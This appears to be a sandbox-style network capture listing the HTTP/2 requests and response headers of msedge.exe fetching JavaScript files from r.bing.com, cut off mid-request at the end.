Response

HTTP/2.0 200

last-modified: Tue, 24 Sep 2024 06:08:44 GMT
etag: 0x8DCDC5F58808E4E
content-length: 468
content-type: text/javascript; charset=utf-8
content-encoding: br
content-md5: Hld4hrLTgdOY14/WVAnFqg==
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 2005641e-a01e-0053-5e15-16f69f000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
access-control-allow-origin: *
cache-control: public, no-transform, max-age=360851
expires: Tue, 22 Oct 2024 01:17:56 GMT
date: Thu, 17 Oct 2024 21:03:45 GMT
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.a6777b5c.1729199025.9ac40e7
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
GET

https://r.bing.com/rp/n7roHZRr1mbNerR9FtbnXOskd84.br.js

msedge.exe

Remote address:

92.123.128.167:443

Request

GET /rp/n7roHZRr1mbNerR9FtbnXOskd84.br.js HTTP/2.0
host: r.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
accept: */*
origin: https://www.bing.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

last-modified: Tue, 24 Sep 2024 07:15:30 GMT
etag: 0x8DCDC68AC3EB654
content-length: 1050
content-type: text/javascript; charset=utf-8
content-encoding: br
content-md5: 4a3fKAPxT8n6JSY4NlwK9Q==
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 620cdd81-801e-006d-3941-1740be000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
access-control-allow-origin: *
cache-control: public, no-transform, max-age=172404
expires: Sat, 19 Oct 2024 20:57:09 GMT
date: Thu, 17 Oct 2024 21:03:45 GMT
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.a6777b5c.1729199025.9ac40e8
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
GET

https://r.bing.com/rp/fWL2xzriHzWjhZXNxQ8Rm3CwUUU.br.js

msedge.exe

Remote address:

92.123.128.167:443

Request

GET /rp/fWL2xzriHzWjhZXNxQ8Rm3CwUUU.br.js HTTP/2.0
host: r.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
accept: */*
origin: https://www.bing.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

last-modified: Tue, 24 Sep 2024 07:04:52 GMT
etag: 0x8DCDC672FE75D26
content-type: text/javascript; charset=utf-8
content-md5: JYNnUW1D/Qe7hGsFi8+mBQ==
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 49b287de-b01e-0065-7294-165bcd000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
access-control-allow-origin: *
content-encoding: gzip
content-length: 437
vary: Accept-Encoding
cache-control: public, no-transform, max-age=327035
expires: Mon, 21 Oct 2024 15:54:20 GMT
date: Thu, 17 Oct 2024 21:03:45 GMT
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.a6777b5c.1729199025.9ac40d9
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
GET

https://r.bing.com/rp/uiannz55FdT0j3p9jGwegfI5aIY.br.js

msedge.exe

Remote address:

92.123.128.167:443

Request

GET /rp/uiannz55FdT0j3p9jGwegfI5aIY.br.js HTTP/2.0
host: r.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
accept: */*
origin: https://www.bing.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

last-modified: Tue, 24 Sep 2024 07:06:43 GMT
etag: 0x8DCDC6771F95EA9
content-type: text/javascript; charset=utf-8
content-md5: OWtJIHWEErxydxBW1ciLxw==
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: a31d8d67-a01e-003e-7b6e-155cb1000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
access-control-allow-origin: *
content-encoding: gzip
content-length: 887
vary: Accept-Encoding
akamai-grn: 0.c0777b5c.1728250325.48437742
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
cache-control: public, no-transform, max-age=298785
expires: Mon, 21 Oct 2024 08:03:30 GMT
date: Thu, 17 Oct 2024 21:03:45 GMT
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.a6777b5c.1729199025.9ac40da
timing-allow-origin: *
GET

https://r.bing.com/rp/eKvcHdnNwo1WcxoSioV4ztnfZk8.br.js

msedge.exe

Remote address:

92.123.128.167:443

Request

GET /rp/eKvcHdnNwo1WcxoSioV4ztnfZk8.br.js HTTP/2.0
host: r.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
accept: */*
origin: https://www.bing.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

content-length: 3847
content-type: text/javascript; charset=utf-8
content-encoding: br
content-md5: ayFkEznj0BrDPAjm17AJAQ==
last-modified: Tue, 24 Sep 2024 06:40:43 GMT
etag: 0x8DCDC63D0601526
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: e3d9f35e-d01e-0075-027e-156d2b000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
access-control-allow-origin: *
cache-control: public, no-transform, max-age=145096
expires: Sat, 19 Oct 2024 13:22:01 GMT
date: Thu, 17 Oct 2024 21:03:45 GMT
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.a6777b5c.1729199025.9ac40e0
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
GET

https://r.bing.com/rp/ID-70CBAEOXh6Nwxga-CxgpUq4k.br.js

msedge.exe

Remote address:

92.123.128.167:443

Request

GET /rp/ID-70CBAEOXh6Nwxga-CxgpUq4k.br.js HTTP/2.0
host: r.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
accept: */*
origin: https://www.bing.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

last-modified: Tue, 24 Sep 2024 06:46:10 GMT
etag: 0x8DCDC64934099EF
content-length: 620
content-type: text/javascript; charset=utf-8
content-encoding: br
content-md5: BEMV1uDaLjBHWgMuX8vJ2g==
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: d7e09b12-701e-0037-230f-15463f000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
access-control-allow-origin: *
cache-control: public, no-transform, max-age=188786
expires: Sun, 20 Oct 2024 01:30:11 GMT
date: Thu, 17 Oct 2024 21:03:45 GMT
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.a6777b5c.1729199025.9ac40e4
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
GET

https://r.bing.com/rp/ydDuUFvQrnTEDpvE14Ya7abrPGk.br.js

msedge.exe

Remote address:

92.123.128.167:443

Request

GET /rp/ydDuUFvQrnTEDpvE14Ya7abrPGk.br.js HTTP/2.0
host: r.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
accept: */*
origin: https://www.bing.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

content-length: 658
content-type: text/javascript; charset=utf-8
content-encoding: br
content-md5: R0hRHsurcD1pLX+6Vf4lXQ==
last-modified: Tue, 24 Sep 2024 07:09:12 GMT
etag: 0x8DCDC67CABA66FC
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 8fa87982-801e-004f-6628-162e88000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
access-control-allow-origin: *
cache-control: public, no-transform, max-age=54393
expires: Fri, 18 Oct 2024 12:10:18 GMT
date: Thu, 17 Oct 2024 21:03:45 GMT
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.a6777b5c.1729199025.9ac40e5
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
GET

https://r.bing.com/rp/kFdRGnsF9oNJsnfvt_bKFj-yBxg.gz.js

msedge.exe

Remote address:

92.123.128.167:443

Request

GET /rp/kFdRGnsF9oNJsnfvt_bKFj-yBxg.gz.js HTTP/2.0
host: r.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
origin: https://www.bing.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
dnt: 1
accept: */*
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: script
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

content-length: 247
content-type: text/javascript; charset=utf-8
content-encoding: gzip
content-md5: 7JvW+NJmxA/Lpn4O+NJgxw==
last-modified: Tue, 24 Sep 2024 05:46:23 GMT
etag: 0x8DCDC5C393E1E1F
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: ef908d50-301e-0056-4322-1802e0000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
access-control-allow-origin: *
cache-control: public, no-transform, max-age=132571
expires: Sat, 19 Oct 2024 09:53:17 GMT
date: Thu, 17 Oct 2024 21:03:46 GMT
vary: Accept-Encoding
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.a6777b5c.1729199026.9ac46dc
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
GET

https://r.bing.com/rp/43BJuM7qM_8Wd1WfIZM2_oK9zrw.gz.js

msedge.exe

Remote address:

92.123.128.167:443

Request

GET /rp/43BJuM7qM_8Wd1WfIZM2_oK9zrw.gz.js HTTP/2.0
host: r.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
origin: https://www.bing.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
dnt: 1
accept: */*
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: script
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

last-modified: Wed, 09 Oct 2024 06:47:07 GMT
etag: 0x8DCE82E31228060
content-length: 284
content-type: text/javascript; charset=utf-8
content-encoding: gzip
content-md5: KMHz3Pwe7M37+mcdhzAxJw==
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 542d4750-901e-0036-083f-1a47c2000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
access-control-allow-origin: *
vary: Accept-Encoding
akamai-grn: 0.87777b5c.1728476815.2be5b25
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
cache-control: public, no-transform, max-age=96693
expires: Fri, 18 Oct 2024 23:55:19 GMT
date: Thu, 17 Oct 2024 21:03:46 GMT
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.a6777b5c.1729199026.9ac46db
timing-allow-origin: *
GET

https://r.bing.com/rp/x6CS8glKlDAxrUISUqfsWELwuk8.gz.js

msedge.exe

Remote address:

92.123.128.167:443

Request

GET /rp/x6CS8glKlDAxrUISUqfsWELwuk8.gz.js HTTP/2.0
host: r.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
origin: https://www.bing.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
dnt: 1
accept: */*
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: script
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

last-modified: Tue, 24 Sep 2024 07:12:46 GMT
etag: 0x8DCDC684A4AFA6A
content-length: 3963
content-type: text/javascript; charset=utf-8
content-encoding: gzip
content-md5: JmFHQFiSwGoXwagcY8jQCA==
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 8f045190-701e-001e-7158-17307d000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
access-control-allow-origin: *
vary: Accept-Encoding
cache-control: public, no-transform, max-age=211614
expires: Sun, 20 Oct 2024 07:50:40 GMT
date: Thu, 17 Oct 2024 21:03:46 GMT
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.a6777b5c.1729199026.9ac4721
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
GET

https://r.bing.com/rp/N58QuNpn0Zq4rZMmOaev1Jdclks.br.js

msedge.exe

Remote address:

92.123.128.167:443

Request

GET /rp/N58QuNpn0Zq4rZMmOaev1Jdclks.br.js HTTP/2.0
host: r.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
origin: https://www.bing.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
dnt: 1
accept: */*
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: script
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

last-modified: Wed, 09 Oct 2024 09:33:43 GMT
etag: 0x8DCE845774EE11D
content-length: 27832
content-type: text/javascript; charset=utf-8
content-encoding: br
content-md5: 2K1iXDtuv3HGCBqF+Ifmuw==
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: e03283b2-901e-0050-36ae-1af598000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
access-control-allow-origin: *
akamai-grn: 0.521a1202.1728527686.dfec3d6
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
cache-control: public, no-transform, max-age=131799
expires: Sat, 19 Oct 2024 09:40:26 GMT
date: Thu, 17 Oct 2024 21:03:47 GMT
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.a6777b5c.1729199027.9ac4dbb
timing-allow-origin: *
GET

https://r.bing.com/rp/iSmXCTdAX5G7NCTq_-KmWPKl9UY.br.js

msedge.exe

Remote address:

92.123.128.167:443

Request

GET /rp/iSmXCTdAX5G7NCTq_-KmWPKl9UY.br.js HTTP/2.0
host: r.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
origin: https://www.bing.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
dnt: 1
accept: */*
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: script
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

content-length: 11945
content-type: text/javascript; charset=utf-8
content-encoding: br
content-md5: bGrkOy35p/Io8rBZy9Tvmw==
last-modified: Wed, 16 Oct 2024 16:15:06 GMT
etag: 0x8DCEDFDB3119A19
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 97416ecd-401e-0059-1b28-20ef16000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
access-control-allow-origin: *
akamai-grn: 0.af777b5c.1729129202.968b37e
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
cache-control: public, no-transform, max-age=356377
expires: Tue, 22 Oct 2024 00:03:24 GMT
date: Thu, 17 Oct 2024 21:03:47 GMT
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.a6777b5c.1729199027.9ac4dbc
timing-allow-origin: *
GET

https://r.bing.com/rp/LTCT2zdUcB3ayDDUpC7BI5zxXuE.br.js

msedge.exe

Remote address:

92.123.128.167:443

Request

GET /rp/LTCT2zdUcB3ayDDUpC7BI5zxXuE.br.js HTTP/2.0
host: r.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
accept: */*
origin: https://www.bing.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

last-modified: Tue, 24 Sep 2024 06:14:00 GMT
etag: 0x8DCDC6014B09FF0
content-length: 542
content-type: text/javascript; charset=utf-8
content-encoding: br
content-md5: Jc7Bnfc4/wV22XT5OjPjLg==
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 3ec12d41-901e-0072-67bf-159bae000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
access-control-allow-origin: *
cache-control: public, no-transform, max-age=50961
expires: Fri, 18 Oct 2024 11:13:11 GMT
date: Thu, 17 Oct 2024 21:03:50 GMT
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.a6777b5c.1729199030.9ac6986
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
GET

https://r.bing.com/rp/HdiojNH85n4iu87NAQvDH5bKMnM.br.js

msedge.exe

Remote address:

92.123.128.167:443

Request

GET /rp/HdiojNH85n4iu87NAQvDH5bKMnM.br.js HTTP/2.0
host: r.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
accept: */*
origin: https://www.bing.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

last-modified: Tue, 24 Sep 2024 06:07:47 GMT
etag: 0x8DCDC5F365A1AB8
content-length: 200
content-type: text/javascript; charset=utf-8
content-encoding: br
content-md5: xGpjcATT83Cyo4MSw4SamQ==
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 448b9b60-901e-0014-7637-1629f4000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
access-control-allow-origin: *
cache-control: public, no-transform, max-age=142550
expires: Sat, 19 Oct 2024 12:39:40 GMT
date: Thu, 17 Oct 2024 21:03:50 GMT
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.a6777b5c.1729199030.9ac6987
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
GET

https://r.bing.com/rp/s_KB_GYETp6JptI_mOoLcYDN4OY.br.js

msedge.exe

Remote address:

92.123.128.167:443

Request

GET /rp/s_KB_GYETp6JptI_mOoLcYDN4OY.br.js HTTP/2.0
host: r.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
accept: */*
origin: https://www.bing.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

last-modified: Tue, 24 Sep 2024 07:06:02 GMT
etag: 0x8DCDC675996C0F4
content-type: text/javascript; charset=utf-8
content-md5: 3Tj2RpIK8rOoXP8XXxZasg==
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: e86ad052-701e-0051-48da-16f465000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
access-control-allow-origin: *
content-encoding: gzip
content-length: 1828
vary: Accept-Encoding
cache-control: public, no-transform, max-age=120832
expires: Sat, 19 Oct 2024 06:37:42 GMT
date: Thu, 17 Oct 2024 21:03:50 GMT
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.a6777b5c.1729199030.9ac6988
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
GET

https://r.bing.com/rp/BFQDsdSF9E9Gp0u-xRbmGVfJfe0.br.js

msedge.exe

Remote address:

92.123.128.167:443

Request

GET /rp/BFQDsdSF9E9Gp0u-xRbmGVfJfe0.br.js HTTP/2.0
host: r.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
accept: */*
origin: https://www.bing.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

last-modified: Tue, 24 Sep 2024 05:57:43 GMT
etag: 0x8DCDC5DCE643BD1
content-length: 1127
content-type: text/javascript; charset=utf-8
content-encoding: br
content-md5: CnBe2qUSynWF62FiKAsEfg==
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: e84c8f2f-001e-0077-4405-176fd1000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
access-control-allow-origin: *
cache-control: public, no-transform, max-age=32959
expires: Fri, 18 Oct 2024 06:13:09 GMT
date: Thu, 17 Oct 2024 21:03:50 GMT
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.a6777b5c.1729199030.9ac6989
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
GET

https://r.bing.com/rp/WPedHfV8dQrn4qkif5azDZSqmn8.br.js

msedge.exe

Remote address:

92.123.128.167:443

Request

GET /rp/WPedHfV8dQrn4qkif5azDZSqmn8.br.js HTTP/2.0
host: r.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
accept: */*
origin: https://www.bing.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

last-modified: Tue, 24 Sep 2024 06:31:17 GMT
etag: 0x8DCDC627F380DA7
content-length: 613
content-type: text/javascript; charset=utf-8
content-encoding: br
content-md5: 1Rf0xX8VNREaPigiNASk/Q==
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 3401a72b-401e-003f-300d-155d4c000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
access-control-allow-origin: *
cache-control: public, no-transform, max-age=205122
expires: Sun, 20 Oct 2024 06:02:32 GMT
date: Thu, 17 Oct 2024 21:03:50 GMT
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.a6777b5c.1729199030.9ac698a
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
GET

https://r.bing.com/rp/00BXM0d2_RU-uUgNDoDSRVtPaQg.br.js

msedge.exe

Remote address:

92.123.128.167:443

Request

GET /rp/00BXM0d2_RU-uUgNDoDSRVtPaQg.br.js HTTP/2.0
host: r.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
